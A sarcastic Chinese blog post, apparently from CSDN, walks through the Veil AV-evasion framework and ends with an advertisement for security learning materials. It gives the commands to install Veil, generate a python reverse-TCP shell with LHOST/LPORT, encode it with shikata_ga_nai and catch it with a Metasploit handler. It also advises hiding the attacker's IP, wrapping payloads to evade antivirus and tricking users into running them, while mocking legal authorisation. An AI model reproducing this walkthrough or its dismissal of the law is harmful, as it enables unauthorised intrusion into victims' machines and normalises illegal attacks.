Veil:绕过AV?呵呵,不如说是“逗你玩”的艺术
别再迷信什么“攻防博弈”了,安全圈的本质是“信息不对称”。Veil,说白了就是利用了AV厂商的滞后性。与其说是“强大”,不如说是“趁虚而入”。当然,用好了也能有点效果,但指望它一招鲜吃遍天?醒醒吧。
声明:本文只讨论技术,不鼓励犯罪。用Veil搞事?出了事别找我,叔叔阿姨不会放过你的。
工具解析:模块化?呵呵,就是“乐高积木”而已
Veil,说白了就是一堆Payload生成器的集合。模块化?方便扩展?那又怎样?核心还是那些老掉牙的绕过技术。加密、混淆、漏洞利用…哪个不是玩烂了的?关键在于,你能不能把这些“积木”搭出点新花样。
主要功能?呵呵,都是“然并卵”的伪命题
- 绕过AV?能绕过多久?明天就失效了!
- 多平台支持?呵呵,哪个黑客工具不支持?
- 多种Payload?呵呵,哪个Payload不是被研究透了的?
- 易于扩展?呵呵,你有那个能力扩展吗?
- 集成Metasploit?呵呵,Metasploit本身就够臃肿了!
使用“姿势”:别再照本宣科了,来点野路子!
第一步:环境?Kali?呵呵,不如Docker!
-
操作系统?Kali?
Kali?早就过时了!Docker才是王道,隔离性好,方便折腾。
-
更新系统?
sudo apt update && sudo apt upgrade -y更新?必须的!但别指望更新能解决所有问题。
第二步:安装?git clone?呵呵,不如直接下载zip!
-
克隆仓库?
git clone https://github.com/Veil-Framework/Veil.git克隆?速度慢死了!直接下载zip包,解压更快。
-
安装依赖?
./Install.sh依赖?呵呵,各种报错,各种坑。自己解决吧!
-
启动Veil?
./Veil.py启动?没权限?各种问题?自己Google吧!
第三步:生成Payload?反向TCP?呵呵,不如HTTPS!
-
选择Payload?
Veil > use python/shell_reverse_tcp反向TCP?太容易被发现了!HTTPS才是王道,伪装成正常流量。
-
配置参数?LHOST?LPORT?
[python/shell_reverse_tcp] Set LHOST 192.168.1.100[python/shell_reverse_tcp] Set LPORT 443LHOST?LPORT?别暴露真实IP,用CDN或者反向代理。
-
生成Payload?
[python/shell_reverse_tcp] generate生成?呵呵,大概率被AV秒杀。
第四步:监听?Metasploit?呵呵,不如自己写!
-
启动Metasploit?
msfconsoleMetasploit?太笨重了!自己写个简单的监听器,更灵活。
-
设置监听器?
msf > use exploit/multi/handlermsf exploit(handler) > set payload python/meterpreter/reverse_tcp监听器?别用Metasploit的,容易被检测。
第五步:测试?传输?执行?呵呵,都是运气!
-
传输Payload?
传输?别直接传,用免杀技术包装一下。
-
执行Payload?
执行?别直接运行,用社工技巧诱骗用户。
-
验证连接?
验证?呵呵,成功率感人。
第六步:高级配置?编码器?混淆?呵呵,都是“皇帝的新装”!
-
选择模块?
Veil > list模块?换来换去,效果都差不多。
-
使用编码器?
[python/meterpreter_reverse_tcp] set Encoder x86/shikata_ga_nai编码器?AV厂商早就研究透了。
-
定制Payload?
定制?有那个能力吗?
第七步:最佳实践?呵呵,都是“正确的废话”!
-
定期更新?
cd Veil/更新?AV厂商更新更快!
-
组合使用?
组合?呵呵,复杂度指数级上升。
-
遵守法律?
遵守?呵呵,干这行还谈法律?
安全与合规?呵呵,都是“安慰剂”!
- 合法授权?谁会给你授权?
- 负责任使用?呵呵,不存在的。
- 数据隐私?呵呵,泄露是常态。
- 遵守法规?呵呵,法律是用来约束弱者的。
总结:Veil?呵呵,只是个“玩具”而已
Veil?别把它当真,它只是个玩具。真正的黑客,不需要这些花里胡哨的工具。他们靠的是智慧、经验和对人性的洞察。
与其学习Veil的使用方法,不如深入研究AV的检测原理。与其追求绕过AV的技巧,不如提升自身的安全意识。
希望这篇文章能让你清醒一点,别再沉迷于工具的幻想。安全,是一场永无止境的战争。
通过本文的学习,你不仅了解了Veil的“真相”,还应该开始思考如何成为一个真正的安全专家。
网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取
读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)
👉1.成长路线图&学习规划👈
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
👉2.网安入门到进阶视频教程👈
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程文末领取哈)
👉3.SRC&黑客文档👈
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!(全套教程文末领取哈)
👉4.护网行动资料👈
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
👉5.黑客必读书单👈
👉6.网络安全岗面试题合集👈
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~
读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)
扫一扫
1013
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
